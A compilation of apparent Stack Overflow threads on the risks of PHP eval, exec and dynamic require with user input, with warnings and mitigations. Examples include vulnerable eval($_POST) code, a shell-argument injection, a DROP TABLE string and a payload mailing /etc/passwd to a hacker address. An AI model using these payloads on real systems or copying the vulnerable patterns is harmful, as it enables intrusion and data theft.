I know that eval is the function in PHP to execute PHP code from an input. Now I want to make a W3Schools like editor. What can I do to protect eval code that I get from POST variable.
$code = eval($_POST["phpusercode"]);
echo $code;
What I want to do is when a user will make a function like this
I want to give user the ability to write his own PHP code on my site without making my website vulnerable to some sort of hacking.
eval evaluates code, so, as #sectus says in comments, execute the code
For example:
eval ("echo 'Hello user'"); //This will execute echo 'Hello user'
So, in your case i think you don't want to execute your user code, so please carify your question and update it.
IMPORTANT:
Use of eval is highly discouraged
NEVER EVER use eval with params by POST/GET without sanitize them
Useful links:
When eval is evil
Avoid SQL injection
Related
$input = $_GET['name'];
eval("\$name= \"$input\";");
Or it is insecure? Thanks. Without any php functions, like preg_replace or any other, just working with user data as string type with \" when put it to eval function.
This basically will allow the user to inject arbitrary code into your application. Think something in the line of
$input=";mysql_query(\"DROP TABLE users\")"
Also eval makes it basically impossible to cache anything but that is a minor consequence.
I haven't found this question on here yet, and I have done some quick Google research on this but I couldn't really find a clear or good answer to this question.
Is it possible to inject a piece of php code in an input field. that would actually work.
//for instance.
//Ill fill in '"test()"' in the field.
<input type="text" name="input" value="'"test()"'">
$injection = $_POST/*(or $_GET)*/['input']; // coming from the input
public function test(){
echo "injection successful";
}
So is this possible?
It is possible, but not like that. If you do what you do in your script, then the code would just be assigned as-is (as a string) to the variable $injection.
You can however execute it like this:
$injection = $_POST/*(or $_GET)*/['input'];
eval($injection);
There are other ways as well, but all have the same issue: you must actually evaluate the string as code to execute it. eval is the most obvious solution for that.
But be very careful when you implement this! If you open such a form for the outside world, everybody can execute any script, including ones that might destroy your server or steal your passwords.
The snippet you posted is harmless, but depending on what you do with user-supplied data, it can be used in an code-injection attack. The linked wiki has some examples, here's a couple of them:
$posted = $_POST['user_input'];
eval($posted);//<--- NEVER DO THIS
However, after 10 years, I've never ever even gotten close to the point where I had to even worry about dreaming of having to maybe go down this route.
Another, slightly less unlikely possible vulnerability is impropper escaping when passing user-data to exec:
$cmdArgument = $_POST['flag'];
exec('ls '.$cmdArgument, $return, $status);
Could leave you vulnerable if I passed this as a "flag" value:
-lta && /usr/bin/env php -r 'echo __DIR__;'
And use that input to start messing around with your file-system.
To protect agains this, use the escapeshellarg and escapeshellcmd functions to sanitize the input.
More common, equally dangerous, but easier to overlook, would be this:
$requested = $_GET['page'];
require $requested.'.php';
Instead, if you want to require scripts like this, a safer, and just as easy approach is this:
switch ($_GET['page'])
{
case 'admin':
require 'admin.php';
break;
case 'user':
require 'user.php';
break;
default:
require 'error.php';
break;
}
The PHP exec command can execute code posted to the server. Otherwise PHP code written in a text box will not be interpereted as PHP but just as a normal string.
I'm using Yii framework.
I want to make a php string into php action.
$var = 'echo "hello";';
//Something to do to run $var
I want to print $var how can I do that?
There is a simple parse php from string option on Yii framework?
You may use eval() function. But, eval is evil in many cases and generally such way of coding makes code harder to follow and debug. Beware for potential unsafe input from user, because, if, for instance, you do
eval('echo "$var"')
and $var was set directly from $_POST, one may set
$var='lol"; mail("hacker#somewhere.com", "Some passwords", "/bin/cat /etc/passwd");' (provided, that webserver is under user that may have access to such functions and directories; even is not, it gives a plenty of opportunities to exploit such vulnerability). So, generally eval is bad idea, but sometimes it is the only solution. Anyway, be very careful.
eval — Evaluate a string as PHP code
Evaluates the given code as PHP.
Caution
The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it without properly validating it beforehand.
http://php.net/manual/en/function.eval.php
$this->evaluateExpression($var);
I want to be able to store PHP code in an SQL Database and display that whenever it is called. I don't want to use include and make loads of files. I want to be able to just put them all in SQL and call them when I want. How can I do this?
I have
$GETPAGE = "SELECT PA_CONTENT from pages where PA_NAME = '$page'";
$GETPAGE2= mysql_query($GETPAGE);
$GETPAGE3= mysql_fetch_array($GETPAGE2);
echo $GETPAGE3[PA_CONTENT];
but it echo's it out visible. Should I replace echo for something else?
Thanks
You can use eval() to execute code that's in strings. Just make sure that you absolutely trust the code that's being run - it will run any PHP code it's given, so it could do malicious things if it's so instructed.
You can evaluate a string as code by using eval()
http://php.net/manual/en/function.eval.php
BUT this is not recommended, see also the warning on that page:
The eval() language construct is very dangerous because it allows
execution of arbitrary PHP code. Its use thus is discouraged. If you
have carefully verified that there is no other option than to use this
construct, pay special attention not to pass any user provided data
into it without properly validating it beforehand.
I'm posting it for a clarification in a specific situation, though user input sanitization/validations is a cliche subject.
A section of the code contain
$haystack=$_GET['user'];
$input is never used for 'echo' or 'print' or in any SQL query or in any such thing. The only further use of the user input ( $haystack ) is to check if the string contains a predefined $needle.
if (preg_match($needle,$haystack)) {
$result="A";
} else {
$result="B";
}
My worry is the execution of a malicious code, rather than the presence of it in the user input.
So the question is, if the user input is used only in the context (no usage in echo,print,SQL etc) mentioned above, is there still a possibility of a malicious code in the user input get executed.
I wanted to add the security measures that is just required for the context than overdoing it.
If used only in the context, there's no way to execute malicious code from the user input.
You should be careful with eval, preg_replace (with modifier e, thanks Pelshoff), database queries and echo (& print, sprintf…).
Its not possible to just execute arbitrary code by being able to alter a string. Only when you output the string directly, or use it in SQL should you be really worried.
preg_match won't end up executing your input. It's too simple and straightforward to have a hidden exploitable bug. If you toss $haystack after running preg_match on it, then it can't possibly hurt you.
While the $haystack may not be reflected, it can obviously affect program flow. The (extremely short) code you posted certainly doesn't look directly vulnerable, but not sanitizing your input may enable code execution in conjunction with other vulnerabilities.